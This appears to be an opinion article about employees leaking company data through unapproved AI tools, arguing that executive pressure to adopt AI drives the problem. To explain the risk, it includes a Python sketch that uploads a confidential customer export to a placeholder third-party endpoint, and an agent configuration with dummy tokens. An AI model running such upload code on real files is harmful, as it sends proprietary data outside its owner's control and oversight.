A developer pastes an API key into ChatGPT to debug a function. A sales manager uploads a client contract to an AI summarizer she found on Product Hunt. Neither of them thinks they did anything wrong. Neither of them files an incident report. And yet, in both cases, proprietary data left the building through a channel the security team cannot see, cannot audit, and cannot reverse.

This is what a data leak looks like in 2026: not a breach, not an intrusion, not a ransom note. Just an employee using a tool that works.

The Policy Gap That Productivity Built

A WRITER survey published April 7 found that 67% of executives believe their company has already suffered a data leak from an unapproved AI tool. Fifty-five percent describe their organization's AI use as a "chaotic free-for-all." These are not small companies with immature IT departments. These are enterprises that deployed AI in at least one function last year (88% of businesses did, by one 2025 count) and then watched their security controls fail to keep pace with the adoption curve.

The mechanism is almost insultingly simple. Generative AI tools accept input over HTTPS, the same protocol your firewall treats as legitimate traffic. Absent TLS interception, nothing at the perimeter distinguishes "employee browsing the web" from "employee uploading a customer database to a third-party model." The data exits cleanly, without triggering a single alert, and lands in a training pipeline or a conversation log governed entirely by someone else's terms of service.
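To make the mechanism concrete, here is a minimal sketch of that exit path. Everything in it is a placeholder: the endpoint, the file name, and the key are invented for illustration, and the point is only that the request is indistinguishable at the perimeter from routine SaaS traffic.

```python
# Minimal sketch of the exfiltration path: one ordinary HTTPS POST.
# Endpoint, file, and key are hypothetical placeholders. Any hosted AI
# tool that accepts text over port 443 presents the same way to
# perimeter monitoring as the rest of the day's web traffic.
import requests

# A hypothetical internal export the employee wants "summarized"
confidential = open("q3_customer_export.csv").read()

resp = requests.post(
    "https://api.example-summarizer.ai/v1/summarize",     # hypothetical third-party model endpoint
    headers={"Authorization": "Bearer sk-personal-key"},  # personal account, outside corporate SSO
    json={"prompt": "Summarize this customer data:\n" + confidential},
    timeout=30,
)
print(resp.json())
```

Nothing here is malformed or obfuscated. It is the same TLS handshake, the same port 443, the same certificate chain as ordinary browsing, which is exactly why it sails past controls built to catch exfiltration that looks like exfiltration.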

OpenClaw, an open-source AI agent framework, crossed 135,000 GitHub stars by March 2026. It can be configured to access Slack, Google Workspace, and internal SaaS tools with persistent memory across sessions. An employee can install it in an afternoon. The IT department may never know it exists until the agent has already read six months of internal communications.
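What that access looks like in practice is worth spelling out, though the sketch below is deliberately generic: it is not OpenClaw's actual configuration syntax, and every token, scope, and URL is invented. The point is how few lines it takes to grant a persistent agent broad read access to systems the security team thinks of as protected.

```python
# Illustrative only: a generic agent configuration, not OpenClaw's real
# API. Every credential, scope, and URL below is a made-up placeholder.
agent_config = {
    "memory": {
        "persistent": True,
        "store": "~/.agent/memory.db",   # carries context across sessions
    },
    "connectors": {
        "slack": {"token": "xoxb-personal-bot-token", "channels": "*"},
        "google_workspace": {"scopes": ["drive.readonly", "gmail.readonly"]},
        "internal_crm": {"base_url": "https://crm.internal.example.com", "api_key": "REDACTED"},
    },
}

# Installed from a laptop in an afternoon; nothing in this file appears
# in the IT department's asset inventory or audit logs.
print(agent_config)
```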

Who Gets Pressured to Adopt and Who Gets Blamed for the Leak

Here is the structural problem that the vendor frameworks do not address: 60% of companies plan layoffs for employees who resist AI adoption. The pressure to use these tools is explicit and career-consequential. The policy prohibiting unapproved tools is, at most, a paragraph in an acceptable-use document nobody reads. When those two forces collide, employees reach for whatever works. The leak is not a failure of individual judgment. It is the predictable output of an incentive structure that rewards adoption and ignores risk.

Trellix's three-part framework, announced April 8, which combines policy, visibility, and enforcement, is a reasonable response to a real problem. I will grant that governance frameworks are more useful than blanket bans, which simply drive shadow AI further underground. But Trellix sells security software, and a framework that requires their product in order to function is not a neutral public-health recommendation. The companies buying DLP dashboards are not the ones creating the pressure to adopt without guardrails. That pressure comes from the same executives who told the WRITER survey they have no confidence in stopping a rogue AI agent, while simultaneously threatening to fire the employees most likely to slow down and ask questions.

Average breach costs rose by $670,000 in 2025 when AI was involved. That number will appear in a board presentation somewhere as a reason to buy security tooling. It should also appear as a reason to stop threatening employees for being cautious.

The exposure is not a technical problem with a technical solution. It is a governance problem created by executives who mandated AI adoption faster than they built the policies to contain it. The developer who pasted that API key into ChatGPT was just trying to keep her job.